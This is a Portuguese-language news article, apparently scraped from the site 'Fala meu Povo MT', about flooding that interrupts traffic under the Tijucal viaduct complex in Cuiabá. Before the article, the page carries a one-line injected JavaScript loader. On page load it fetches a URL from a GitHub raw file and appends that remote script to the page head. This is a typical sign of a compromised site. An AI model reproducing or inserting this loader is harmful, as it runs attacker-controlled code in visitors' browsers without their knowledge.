;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
Fala meu Povo MT

Chuva alaga Complexo do Tijucal em Cuiabá e trânsito é interditado

Atualizada às 08h56 – Segundo a Secretaria de Mobilidade Urbana (Semob), a água baixou e o trecho já foi liberado para trânsito.

07h38 – O trânsito na parte inferior do Complexo Viário Deputado Walter Rabello, conhecido como ‘viaduto do Tijucal’, na região do bairro que leva o mesmo nome, em Cuiabá, ficou parcialmente interditado por conta de um alagamento. A água tomou conta de uma parte da obra, que está no pacote das remanescentes da Copa do Mundo de 2014.

Segundo as informações da Secretaria de Mobilidade Urbana (Semob), o trânsito precisou ser interditado na parte inferior, sentido bairro-Centro e só deverá ser liberado quando a água baixar.

Nas imagens, é possível notar o acúmulo expressivo de água no local. Ainda não se sabe porque a água não teve vazão do local, já que isto deveria estar previsto no projeto.

Nas outras pistas, o trânsito segue liberado normalmente.

A estrutura integra uma trincheira de 740 metros de extensão entre a BR-364 até a avenida Archimedes Pereira Lima, e um viaduto de 520 metros de extensão, que liga a BR-364, passando pelo trevo de acesso do bairro Tijucal, até a avenida Fernando Corrêa da Costa. No total, o empreendimento apresentou custo final de R$ 33,2 milhões.

 

Fonte: Olhar Direto

Sair da versão mobile